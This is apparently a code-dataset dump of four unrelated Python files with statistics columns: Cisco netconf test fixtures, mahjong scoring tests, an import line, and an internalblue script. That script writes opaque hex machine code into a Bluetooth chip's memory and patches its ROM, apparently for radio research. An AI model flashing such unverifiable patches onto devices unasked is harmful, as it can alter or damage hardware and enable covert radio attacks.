| 0.030303
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
50ba4e237edb90dd6831a37367d420d4abd52d4a
| 6,596
|
py
|
Python
|
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | 10
|
2015-01-21T22:04:40.000Z
|
2017-06-29T06:55:45.000Z
|
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | null | null | null |
ironic_neutron_plugin/tests/unit/drivers/cisco/fixtures.py
|
rackerlabs/ironic-neutron-plugin
|
7b3e19840048bc49d846362b84973c2f2b03b05e
|
[
"Apache-2.0"
] | 8
|
2015-01-30T16:40:30.000Z
|
2020-07-23T06:06:53.000Z
|
# Copyright (c) 2014 OpenStack Foundation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def ok():
    """Return a canned NX-OS netconf success reply (an empty ``<data/>`` element)."""
    return """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:e7ef8254-10a6-11e4-b86d-becafe000bed">
<data/>
</rpc-reply>"""
def show_dhcp(port):
    """Return a canned ``show running-config dhcp`` reply for port-channel<port>.

    The reply contains a single IP source binding on the given port-channel.
    """
    binding = (
        "ip source binding 10.0.0.1 FFFF.FFFF.FFFF.FFFF "
        "vlan 1 interface port-channel%s" % port
    )
    template = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config dhcp | egrep port-channel%(port)s$
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface port-channel%(port)s
%(dhcp)s
</data>
</rpc-reply>"""
    return template % {"port": port, "dhcp": binding}
def show_port_channel_config_trunked(port):
    """Return a canned running-config reply for a trunked port-channel<port> interface."""
    reply = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface port-channel%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface port-channel%(port)s
description CUST39a8365c-3b84-4169-bc1a-1efa3ab20e04-host
switchport mode trunk
switchport trunk allowed vlan 1,2
ip verify source dhcp-snooping-vlan
spanning-tree port type edge trunk
no negotiate auto
vpc %(port)s
</data>
</rpc-reply>"""
    # Same port number is substituted both for the interface and its vPC id.
    return reply % {"port": port}
def show_ethernet_config_trunked(port):
    """Return a canned running-config reply for a trunked Ethernet1/<port> interface."""
    reply = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface Ethernet1/%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface Ethernet1/%(port)s
description CUST39a8365c-3b84-4169-bc1a-1efa3ab20e04-host
no lldp transmit
switchport mode trunk
switchport trunk allowed vlan 1,2
spanning-tree port type edge trunk
spanning-tree bpduguard enable
channel-group %(port)s mode active
</data>
</rpc-reply>"""
    # The port number doubles as the channel-group id.
    return reply % {"port": port}
def show_ethernet_config_access(port):
    """Return a canned running-config reply for an access-mode Ethernet1/<port> interface."""
    reply = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:4a9be8b4-df85-11e3-ab20-becafe000bed">
<data>
!Command: show running-config interface Ethernet1/%(port)s
!Time: Mon May 19 18:40:08 2014
version 6.0(2)U2(4)
interface Ethernet1/%(port)s
description CUST32fdc565-7860-47b9-be57-f5d5ee1875a0-host
switchport access vlan 3
spanning-tree port type edge
spanning-tree bpduguard enable
</data>
</rpc-reply>"""
    return reply % {"port": port}
def show_port_channel_status(port):
    """Return a canned interface-status reply: port-channel<port> up with an active vPC."""
    vpc_status = "vPC Status: Up, vPC number: %s" % port
    reply = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:c87305ee-0d19-11e4-ab20-becafe000bed">
<data>
<show>
<interface>
<__XML__INTF_ifeth>
<__XML__PARAM_value>
<__XML__INTF_output>port-channel%(port)s</__XML__INTF_output>
</__XML__PARAM_value>
<__XML__OPT_Cmd_show_interface_if_eth___readonly__>
<__readonly__>
<TABLE_interface>
<ROW_interface>
<interface>port-channel%(port)s</interface>
<state>up</state>
<vpc_status>%(status)s</vpc_status>
</ROW_interface>
</TABLE_interface>
</__readonly__>
</__XML__OPT_Cmd_show_interface_if_eth___readonly__>
</__XML__INTF_ifeth>
</interface>
</show>
</data>
</rpc-reply>"""
    return reply % {"port": port, "status": vpc_status}
def show_ethernet_status(port):
    """Return a canned interface-status reply: ethernet1/<port> in the ``up`` state."""
    reply = """<?xml version="1.0" encoding="ISO-8859-1"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"
xmlns:if="http://www.cisco.com/nxos:1.0:if_manager"
xmlns:nxos="http://www.cisco.com/nxos:1.0"
message-id="urn:uuid:c87305ee-0d19-11e4-ab20-becafe000bed">
<data>
<show>
<interface>
<__XML__INTF_ifeth>
<__XML__PARAM_value>
<__XML__INTF_output>ethernet1/%(port)s</__XML__INTF_output>
</__XML__PARAM_value>
<__XML__OPT_Cmd_show_interface_if_eth___readonly__>
<__readonly__>
<TABLE_interface>
<ROW_interface>
<interface>ethernet1/%(port)s</interface>
<state>up</state>
</ROW_interface>
</TABLE_interface>
</__readonly__>
</__XML__OPT_Cmd_show_interface_if_eth___readonly__>
</__XML__INTF_ifeth>
</interface>
</show>
</data>
</rpc-reply>"""
    return reply % {"port": port}
| 33.825641
| 74
| 0.608096
| 887
| 6,596
| 4.335964
| 0.201804
| 0.014561
| 0.043682
| 0.054602
| 0.75221
| 0.73765
| 0.709048
| 0.709048
| 0.700988
| 0.643526
| 0
| 0.070491
| 0.249394
| 6,596
| 194
| 75
| 34
| 0.706322
| 0.085052
| 0
| 0.790541
| 0
| 0.047297
| 0.884385
| 0.256811
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047297
| false
| 0
| 0
| 0
| 0.094595
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
50de7bc9dd52da659150da303de2ad03d25e2b25
| 2,680
|
py
|
Python
|
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
mahjonggscoring/rules/test/test_two_kongs.py
|
kajiki/py-mahjongg-scoring
|
b23202de018a8206a4be5594247faa0754e7e54e
|
[
"MIT"
] | null | null | null |
import unittest2
from mahjonggscoring.rules import TwoKongs
from mahjonggscoring import Hand
#Both kongs are melded.
class TestTwoKongsPartial(unittest2.TestCase):
    """Two melded kongs in a hand whose sets are individually flagged concealed/melded."""

    def setUp(self):
        tiles = [
            ["W", "W", "W"],
            ["8#", "8#", "8#", "8#"],
            ["3#", "3#", "3#", "3#"],
            ["2/", "2/", "2/"],
            ["3●", "3●"],
        ]
        # Only the fourth set is concealed; both kongs are melded.
        hand = Hand(tiles, {"concealed": [False, False, False, True, False]})
        self.examination = TwoKongs(hand)
        self.passed = self.examination.evaluate()

    def test_passed(self):
        self.assertTrue(self.passed)

    def test_points(self):
        self.assertEqual(self.examination.points, 4)
class TestTwoKongsExplicit(unittest2.TestCase):
    """Two melded kongs with concealment explicitly disabled for the whole hand."""

    def setUp(self):
        tiles = [
            ["W", "W", "W"],
            ["8#", "8#", "8#", "8#"],
            ["3#", "3#", "3#", "3#"],
            ["2/", "2/", "2/"],
            ["3●", "3●"],
        ]
        # A single boolean marks every set as melded.
        hand = Hand(tiles, {"concealed": False})
        self.examination = TwoKongs(hand)
        self.passed = self.examination.evaluate()

    def test_passed(self):
        self.assertTrue(self.passed)

    def test_points(self):
        self.assertEqual(self.examination.points, 4)
class TestTwoKongsImplicit(unittest2.TestCase):
    """Two melded kongs relying on the Hand default concealment behaviour."""

    def setUp(self):
        tiles = [
            ["W", "W", "W"],
            ["8#", "8#", "8#", "8#"],
            ["3#", "3#", "3#", "3#"],
            ["2/", "2/", "2/"],
            ["3●", "3●"],
        ]
        # No options dict: exercise Hand's defaults.
        hand = Hand(tiles)
        self.examination = TwoKongs(hand)
        self.passed = self.examination.evaluate()

    def test_passed(self):
        self.assertTrue(self.passed)

    def test_points(self):
        self.assertEqual(self.examination.points, 4)
class TestNotTwoKongs(unittest2.TestCase):
    """Hands that must NOT score the two-kongs rule."""

    def _examine(self, tiles, options=None):
        # Build the hand, run the rule, and record the verdict on self.
        hand = Hand(tiles, options) if options is not None else Hand(tiles)
        self.examination = TwoKongs(hand)
        self.passed = self.examination.evaluate()

    def test_not_kong(self):
        # No four-of-a-kind sets at all.
        self._examine([
            ["6/", "6/", "6/"],
            ["2/", "3/", "4/"],
            ["F", "F", "F"],
            ["2/", "3/", "4/"],
            ["8/", "8/"],
        ])
        self.assertFalse(self.passed)

    def test_not_melded(self):
        # Both kongs are concealed rather than melded.
        self._examine(
            [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]],
            {"concealed": [False, True, True, False, False]},
        )
        self.assertFalse(self.passed)

    def test_one_melded(self):
        # Only one of the two kongs is melded.
        self._examine(
            [["W", "W", "W"], ["8#", "8#", "8#", "8#"], ["3#", "3#", "3#", "3#"], ["2/", "2/", "2/"], ["3●", "3●"]],
            {"concealed": [False, False, True, False, False]},
        )
        self.assertFalse(self.passed)

    def test_special_hand(self):
        # A special single-group hand contains no kongs at all.
        self._examine([["5/", "5/", "3/", "3/", "4/", "4/", "8/", "8/", "6/", "6/", "7/", "7/", "5/", "5/"]])
        self.assertFalse(self.passed)
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest2.main()
| 35.733333
| 112
| 0.58209
| 364
| 2,680
| 4.252747
| 0.134615
| 0.021964
| 0.01938
| 0.122093
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0.80168
| 0
| 0.043137
| 0.143657
| 2,680
| 75
| 113
| 35.733333
| 0.627015
| 0.008209
| 0
| 0.683333
| 0
| 0
| 0.091046
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.216667
| false
| 0.283333
| 0.05
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
50e8f206f440bdcbbd9bd939abccd9fc80b74198
| 102
|
py
|
Python
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 16
|
2020-02-13T04:19:28.000Z
|
2021-12-25T16:13:53.000Z
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 3
|
2020-01-28T06:00:44.000Z
|
2020-02-11T07:56:46.000Z
|
base/__init__.py
|
ohshyuk5/stable-baselines-tf2
|
02442226c6b2b3729c8772e2903963ad590313f7
|
[
"MIT"
] | 2
|
2020-01-15T07:18:02.000Z
|
2020-01-15T08:26:57.000Z
|
from base.rl import BaseRLAlgorithm, ActorCriticRLAlgorithm, ValueBasedRLAlgorithm, TensorboardWriter
| 51
| 101
| 0.892157
| 8
| 102
| 11.375
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068627
| 102
| 1
| 102
| 102
| 0.957895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
50ed362e4a60fb0851df88e2216c212b20e8974c
| 12,181
|
py
|
Python
|
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | 11
|
2021-07-01T07:15:11.000Z
|
2021-08-29T21:57:56.000Z
|
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | null | null | null |
patch.py
|
RCayre/radiosploit_patches
|
bdab0d60c67658232d810e375a63ce2a5342cdbf
|
[
"MIT"
] | 3
|
2021-07-01T07:15:12.000Z
|
2021-07-27T14:23:53.000Z
|
from pwnlib.asm import asm
from internalblue import Address
from internalblue.adbcore import ADBCore
from struct import pack
import os
# Setup: create an internalblue ADB core and attach to the first device
# reported by device_list().  NOTE(review): device_list() entries appear to be
# tuples with the interface name at index 1 -- confirm against internalblue docs.
internalblue = ADBCore(serial=True)
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# Connect internalblue to the device; abort the whole script if that fails,
# since every later writeMem/patchRom call needs a live connection.
if not internalblue.connect():
    print("No connection to the device !")
    exit(-1)
# Data / variables
print("Installing data / variables...")
internalblue.writeMem(0x00203124, bytes.fromhex('10022800'))
internalblue.writeMem(0x00210500, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210504, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210508, bytes.fromhex('00000000'))
internalblue.writeMem(0x0021050c, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210510, bytes.fromhex('ff'))
internalblue.writeMem(0x00210514, bytes.fromhex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x0021053c, bytes.fromhex('ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x0021063b, bytes.fromhex('00ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'))
internalblue.writeMem(0x00210670, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210674, bytes.fromhex('00000000'))
internalblue.writeMem(0x00210678, bytes.fromhex('00000000'))
internalblue.writeMem(0x0021067c, bytes.fromhex('03f73a1b3970af339a03f73ab239702f3b9b0377aeb33970f73a9b0370afb339fc08c564c68f504c65fc08454dc68f50c464fc08514cc60f08c5647c8f504c46'))
internalblue.writeMem(0x002106c0, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106c4, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106c8, bytes.fromhex('00000000'))
internalblue.writeMem(0x002106cc, bytes.fromhex('526164696f53706c6f6974'))
# Functions and callbacks
print("Installing function and callbacks...")
internalblue.writeMem(0x00210700, bytes.fromhex('2de9f04fa54b1b68002b00f0e281a44b1b6803f48073002b00f0d881a14b1b68002b40f0d381ff2200219f48f0f5f4f8ff229e499c48f0f5cdf8984b1b68012b35d1994a9a499b4808f05af9984b1b68002b00f0b781964b1b683b2b00f2b281934b1b68dbb20433d8b2914b1b68dbb20233dbb21a46ff2158f6b3ff044604f10a03864a1268d2b21a7004f10b038a4a1268d2b21a7004f10c00854b1b681a468449f1f5e9ff204658f67cfe8ae17b4b1b68022b47d17c4a7d497e4808f020fc7b4b1b68dbb27d4a19467a4808f098fb0346002b00f07681754b1b68dab2774b1b78d31adbb20833d8b2714b1b68dab2724b1b78d31adbb20633dbb21a46ff2158f66fff044604f10a03644a1268d2b21a7004f10b03684a1268d2b21a7004f10c00664b1b78043b624a9918604b1b68624a12789b1a04331a46f1f59dff204658f630fe3ee1554b1b68032b22d15c4b1a465749574808f0d3fb0322ff21052058f63fff044604f10a034c4a1268d2b21a7004f10b03504a1268d2b21a7004f10c0301224b491846f1f576ff204658f609fe17e1414b1b68042b79d1424a4449444808f0adfb424b1b68dbb2434a1946404808f025fb0346002b00f003813f4b1b78043b3b4ad35c1a463e4b1b68dbb29a4240f0f780394b1b78033b354ad35c1a46384b1b681b0adbb29a4240f0ea80324b1b78023b2f4ad35c1a46314b1b681b0cdbb29a4240f0dd802c4b1b78013b284ad35c1a462b4b1b681b0e9a4240f0d180234b1b68dab2244b1b78d31adbb20833d8b21e4b1b68dab2204b1b78d31adbb20633dbb21a46ff2158f6cafe044604f10a03114a1268d2b21a7004f10b03154a1268d2b21a7004f10c00134b1b78043b104a99180e4b1b68104a12789b1a04331a46f1f5f8fe204658f68bfd99e0024b1b68052b55d100241fe000052100ac8b3100780621003c05210000243700700621003c06210004052100100521003d052100c0062100454b1b5d184608f017f903461a46424b1a550134c72cf3dd0722ff21092058f67cfe044604f10a033c4a1268d2b21a7004f10b033a4a1268d2b21a7004f10c05384b1b68dbb2184608f0f6f803462b7004f10d05334b1b681b0adbb2184608f0ebf803462b7004f10e0303222a491846f1f59efe204658f631fd3fe0274b1b68062b3bd1002409e0234b1b5d184608f0d3f803461a46204b1a550134c72cf3dd21491d4808f048fc03461a461f4b1a601e4b1b68dbb20433d8b21c4b1b68dbb20233dbb21a46ff2158f627fe044604f10a03124a1268d2b21a7004f10b03104a1268d2b21a7004f10c00104b1b681a460d49f1f55dfe204658f6f0fc0c4b01221a6002e00a4b002
21a60bde8f04f2de9f0416bf6d9be00bf3c0521000005210004052100c80621003c0621007006210078062100'))
internalblue.writeMem(0x00210c00, bytes.fromhex('074b1b68002b03d1064b1b68002b01d0002301e0044b1b6860f6cebc00bf00bf000521000805210050312000'))
internalblue.writeMem(0x00210d00, bytes.fromhex('1a4b1b68002b2ad0184b1b68012b03d117487ff685b928e0144b1b68022b03d0124b1b68042b04d14ff033307ff678b91be00e4b1b68052b04d14ff0aa407ff66fb912e0094b1b68032b03d0074b1b68062b0ad1074800687ff662b905e010b108467ff65db97ff68db900bf0005210003f73a9bc0062100'))
internalblue.writeMem(0x00210e00, bytes.fromhex('0fb4094b1b68002b09d008480068084940f0800008600fbc69f6cfb902e00fbc69f6b9b900bf00bf0005210004052100a4863100'))
internalblue.writeMem(0x00210f00, bytes.fromhex('2de9f04f0746042283b0ff21062058f6e8fb634e3b7bdff890b1012bcbf80030814633467a7bdff8948106bf02eb8202343a023ac8f8002006f12804002203f8012f9c424ff00005f9d1564a0121422311725372202106231046d372157355739573d573157455749172019283f638f9dbf800309bb9dbf80030d8f80000522189f80d004846582289f80c3089f80a1089f80b2003b0bde8f04f58f683ba019a531e03f8015f9c424ff0000af9d10123137213739373d37341202021082350729172d37299211923364882f80da0117491745374d374019283f6a0f8019a06f801afb4424ff00005f9d101234220137213732021062350722a48d37255739573d57315745574917283f6eaf8dbf80030254e022b06d1ba7b2449521b18bf01220a60aae7032b1fd0042b32d0062ba2d11f4d052207f10e012846f1f59dfba87807f0defd0446687807f0dafd0304287843ea046407f0d4fd44f05504154a44ea00203368106088e7114c134d07f10e0104222046f1f580fb7023214605222846237108f03df8d5f805100a4a3368116073e7d7f80e000749044a086015606ce7130521001405210000052100c40621003c052100c00621003c06210004052100'))
internalblue.writeMem(0x00214400, bytes.fromhex('08480068002807d007487bf609fe0023064a136060f6cabc7bf630fe60f6c6bc00bf00000805210003f73a9ba5790200'))
internalblue.writeMem(0x00214500, bytes.fromhex('06480068002803d0054a126860f643bdd4f8882260f63fbd00bf0000080521000c052100'))
internalblue.writeMem(0x00214600, bytes.fromhex('80b588b000af78609e4b01221a607b680c331b78012b08d17b680d331b78184604f06ef903461a4604e07b680d331b78023b1a46944b1a607b680e331b781a46924b1a607b680c331b78012b40f08c800023fb6107e08e4afb69134400221a70fb690133fb61fb69032bf4dd7b6803f10f01864b1b681a468648eef57df80023bb6107e0844abb69134400221a70bb690133bb61bb69fe2bf4dd00237b615ce07b4a7b6913441b781b09fb72784a7b6913441b7803f00f03bb727b69db00ba7a764911f82210744ad1547b69db005a1cbb7a72499b000b4459786f4b99547b69db009a1cbb7a6d499b000b4499786a4b99547b69db00da1cbb7a68499b000b44d978654b99547b69db000433fa7a634911f82210604ad1547b69db005a1dfb7a5e499b000b4459785b4b99547b69db009a1dfb7a59499b000b449978564b99547b69db00da1dfb7a54499b000b44d978514b99547b6901337b614c4b1b681a1d7b699a429cd84ce07b680c331b78022b09d07b680c331b78032b04d07b680c331b78042b11d17b6803f10f013f4b1b681a463f48edf5f0ff3c4b1b68dbb21a463b493d4804f0acfc2be07b680c331b78052b04d07b680c331b78062b21d17b6803f10f01314b1b681a463148edf5d4ff00233b6110e02e4a3b6913441b78184604f00efa034619462b4a3b6913440a461a703b6901333b613a69244b1b689a42e9d3274b4ff4ba621a60264b05221a60254b10221a607b680c331b78012b0fd11a4b1b680433db001a461b491f48edf5a3ff1f4a154b1b680433db0013601de07b680c331b78042b0dd8104b1b685b001a4611491548edf58fff154a0b4b1b685b0013600ae0094b1b681a460a490f48edf582ff0e4b054a12681a600023fb6020e000bf080521000c052100700621003c062100400621003c0521007c062100382123004021230044212300c02e2300c0322300174afb68134400221a70fb680133fb60fb68272bf4dd124b01221a72104b39225a720f4b20229a720d4b0622da720c4b01221a730a4b01225a73094b00229a73074b0022da73064b00221a74044b00225a7403487ff6b6f900bf2037bd4680bd14052100'))
internalblue.writeMem(0x00214f00, bytes.fromhex('2de9ff4f214b1b68002b37d00422ff21062054f6e6fb0546002403e01c4b00221a550134272cf9dd194b01221a72184b3c225a72164b20229a72154b0122da72134b00221a7312487ef670fe0f4b00221a6005f10a0354221a7005f10b0358221a7005f10c0301221a7005f10d03094a1268d2b21a70284654f694fabde8ff4f23689a425cf654bf00bf00bf08052100140521000c052100'))
internalblue.writeMem(0x00218700, bytes.fromhex('2de9f041002600f1ff3c304601391cf8017f11f801ef07f07f08012200e00132c2f1080447fa04f34efa04f56b404eb1dc0700d50130082af1d10136042ee6d1bde8f081012af3d148fa04f46c40e307f0d4e4e7'))
internalblue.writeMem(0x00218800, bytes.fromhex('002912dd10b4002207e032b110f8013c047843ead41300f8013c037801325b00914200f8013bf0d110bc7047'))
internalblue.writeMem(0x00218900, bytes.fromhex('00eb800034387047'))
internalblue.writeMem(0x00218a00, bytes.fromhex('2de9f04f054683b001919346431e00f13101002203f8012f8b42fbd12b78cbf1010643f007032b7034495846fff768fe082814d90bf1ff3301210ae058781a78440042ead012ff291a705c70ecd001310133de42f2d15a7852005a70f7e700231e46012700930bf1ff3acbeb0704dff88c804ff0000941465846fff741fe082808f1040809d909f10109b9f1100ff2d1019b1e6003b0bde8f08f009b53b3ab5db90009fa01f21343ab5587f00103012f1f464ff0010308bf013600934ff0200c5346012001e001300133dc420ed059781a784fea410eff2842ead111197083f801e0f0d1bcf1010cead1c0e75a7852005a70e8e7b9f10a0fe0d1d0e77c062100'))
internalblue.writeMem(0x00218c00, bytes.fromhex('c109430141eac01103f04003c200194302f020024300114303f010034210194302f00802c3100a4303f004034011134300f002001843c0b2704700bf'))
internalblue.writeMem(0x00218d00, bytes.fromhex('1b68034a13605a0661f650b900bf0000c8062100'))
internalblue.writeMem(0x00218e00, bytes.fromhex('013910b44ff0000216d410f8014b082382ea042212f4004f4fea420418bf84f4815203f1ff3314bf82f00102520013f0ff03efd10139e8d590b210bc704700bf'))
internalblue.writeMem(0x00218f00, bytes.fromhex('2de9f0470026a1f1020eb645167047dd8046074630460139dff88c9008eb010cf044c6eb0e05013dba464ff0000116d41af8014b082381ea042111f4004f4fea410418bf84f4815103f1ff3314bf81f00101490013f0ff03efd1013de8d59cf8004098f8003089b243ea0423994213d0d9f80030012b06d00136764507f10107cfdbbde8f08739781129f5d17978222904bf18461670efe716700120bde8f0873046bde8f08700bfc4062100'))
internalblue.writeMem(0x00219000, bytes.fromhex('f8b504460d461746002601e0322e31d0b95dbb19c8108a105b7800f0080002f00402024301f001004910024301f00201580011434fea830e20f07f0008430ef0400eda0040ea0e0002f020021b0103f0100310431843c0b2fff7d2fd80f05a00c0b2c6f34603a52806f10206e054cdd12b60f8bd19232b60f8bd00bf'))
internalblue.writeMem(0x00219100, bytes.fromhex('002a56d02de9f041074601f1ff3800eb420618f8010f023780f05a00fff770fd044645b205f00400a101e310621040eac41001f0400103f0010e0843510140ea0e0001f020011201014302f0100260000a435b0000f0080003f0020310431843c0b2fff74dfd05f02003c4f3c71522112b4343eac213920143ea450502f040026308a411154303f01002e300154303f00803a4001d4304f004042c4307f8020ce0b2fff72dfd07f8010cbe42b1d1bde8f0817047'))
internalblue.writeMem(0x00219200, bytes.fromhex('2de9f0411d4b1b6813f0ff072ad0c3f30728b8f1000f25d0c3f3074cbcf1000f20d0a1f1030e4feace0ebef1000fc8bf002617dd81b10346002406e013f8012c1d7842ead51203f8012c1a78013452008c4203f8012bf1d18378bb4205d001367645e7d10020bde8f081c3784345f6d103796345f3d10120bde8f081c0062100'))
internalblue.writeMem(0x00219300, bytes.fromhex('30b4044600788008431e1c2b0bd80d1814f8012fd30943ea420301f8013b8d42f6d130bc7047002030bc7047'))
# Hooks: patch small 4-byte sequences into the firmware ROM.
# NOTE(review): the patch bytes are presumably Thumb branch/veneer instructions
# redirecting execution into the handlers written to RAM earlier in this
# script (the 0x0021xxxx region) -- confirm against a disassembly.
print("Installing Hooks...")
internalblue.patchRom(0x000715b4, bytes.fromhex('9ff124bb'))
internalblue.patchRom(0x00071e2c, bytes.fromhex('a3f168b8'))
internalblue.patchRom(0x00074da8, bytes.fromhex('9ff12abb'))
internalblue.patchRom(0x00074f92, bytes.fromhex('9ff1b5ba'))
internalblue.patchRom(0x00079fa8, bytes.fromhex('9ef1aabe'))
internalblue.patchRom(0x0007a192, bytes.fromhex('96f135be'))
internalblue.patchRom(0x0007c88c, bytes.fromhex('93f138bf'))
internalblue.patchRom(0x0009002e, bytes.fromhex('2022fff7'))
internalblue.patchRom(0x0009007c, bytes.fromhex('80f140be'))
# The last four patches write little-endian 32-bit values (addresses/constants)
# rather than instruction encodings.
internalblue.patchRom(0x000f2398, bytes.fromhex('010f2100'))
internalblue.patchRom(0x000f239c, bytes.fromhex('00000800'))
internalblue.patchRom(0x000f23a0, bytes.fromhex('01462100'))
internalblue.patchRom(0x000f23a4, bytes.fromhex('00000800'))
print("Terminated :)")
# shutdown connection
internalblue.shutdown()
# Hard exit: os._exit skips Python cleanup (atexit handlers, flushing),
# leaving internalblue's background threads no chance to block shutdown.
os._exit(0)
| 152.2625
| 2,092
| 0.941056
| 389
| 12,181
| 29.462725
| 0.354756
| 0.053398
| 0.01745
| 0.027921
| 0.034901
| 0
| 0
| 0
| 0
| 0
| 0
| 0.533317
| 0.015598
| 12,181
| 79
| 2,093
| 154.189873
| 0.422484
| 0.01174
| 0
| 0
| 0
| 0
| 0.744389
| 0.716376
| 0
| 1
| 0.042394
| 0
| 0
| 1
| 0
| false
| 0
| 0.074627
| 0
| 0.074627
| 0.074627
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
